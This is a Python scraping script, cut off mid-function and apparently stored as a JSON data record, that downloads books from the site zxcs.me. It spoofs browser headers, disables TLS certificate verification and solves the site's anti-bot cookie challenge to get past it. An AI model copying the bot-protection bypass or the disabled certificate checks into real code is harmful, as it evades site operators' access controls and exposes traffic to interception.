+{"seq_id":"21309186488","text":"import json\nimport logging\nimport requests\nimport ssl\nssl.HAS_SNI = False\nrequests.packages.urllib3.disable_warnings()\nimport execjs\nimport re\n\nLOG = logging.getLogger(\"ZXCS\")\nLOG.setLevel(logging.INFO)\nF = logging.FileHandler(\"zxcs.log\", \"a\", encoding=\"utf-8\")\nF.setFormatter(logging.Formatter('%(asctime)s:%(message)s'))\nLOG.addHandler(F)\n\npro = {\n \"http\": None,\n \"https\": None\n}\n\nheader = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Edg/101.0.1210.39\",\n \"sec-ch-ua\": '''\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"''',\n \"sec-ch-ua-mobile\": \"?0\",\n \"sec-ch-ua-platform\": \"Windows\",\n \"sec-fetch-dest\": \"empty\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-site\",\n \"dnt\": \"1\",\n \"accept\": \"application/json, text/plain, */*\",\n \"accept-encoding\": \"utf-8\",\n \"accept-language\": \"zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\",\n \"host\": \"zxcs.me\",\n \"referer\": \"http://zxcs.me/\",\n \"cookie\":\"security_session_verify=453a822f276fca5c9d8b898130b7e7bd; srcurl=687474703a2f2f7a7863732e6d652f\"\n}\n\nIP = \"92.242.62.123\"\n\nclass ZXCS():\n def __init__(self) -> None:\n self.url = f\"http://{IP}/\"\n self.s = requests.session()\n self.s.trust_env = False\n self.s.keep_alive = False\n \n def get(self, path):\n URL = f\"{self.url}{path}\"\n r = self.s.get(url=URL, proxies=pro, headers=header, verify=False)\n LOG.info(f\"GET:\\t{r.status_code}\\t{self.url}{path}\")\n return r\n \n def antiBOT(self):\n r = self.s.get(self.url,verify=False,headers=header,allow_redirects=False)\n cookies = r.headers[\"Set-Cookie\"].split(\";\")[0]\n LOG.info(f\"ANTIBOT:\\t{r.status_code}\\t{self.url}\\t{cookies}\")\n cookies = \"{\\\"\" + cookies.replace(\";\",\"\\\",\\\"\").replace(\"=\",\"\\\":\\\"\").replace(\" \",\"\") + \"\\\"}\"\n Cookies = json.loads(cookies)\n for i in Cookies:\n cookies = i + \"=\" + Cookies[i] + \"; srcurl=687474703a2f2f7a7863732e6d652f\"\n header[\"Cookie\"] = cookies\n \n r = self.s.get(self.url + \"?security_verify_data=\" + self.stringToHex(Cookies[\"security_session_verify\"]),verify=False,headers=header,allow_redirects=False)\n cookies = r.headers[\"Set-Cookie\"].split(\";\")[0]\n LOG.info(f\"ANTIBOT:\\t{r.status_code}\\t{self.url}\\t{cookies}\")\n \n @staticmethod\n def stringToHex(str):\n js = '''function stringToHex(str) {\n var val = \"\";\n for (var i = 0; i < str.length; i++) {\n if (val == \"\")\n val = str.charCodeAt(i).toString(16);\n else\n val += str.charCodeAt(i).toString(16);\n }\n return val;\n }'''\n run = execjs.compile(js)\n return run.call(\"stringToHex\",str)\n \n def get_download_url(self,id):\n r = self.get(path=f\"download.php?id={id}\")\n url = re.findall(r'''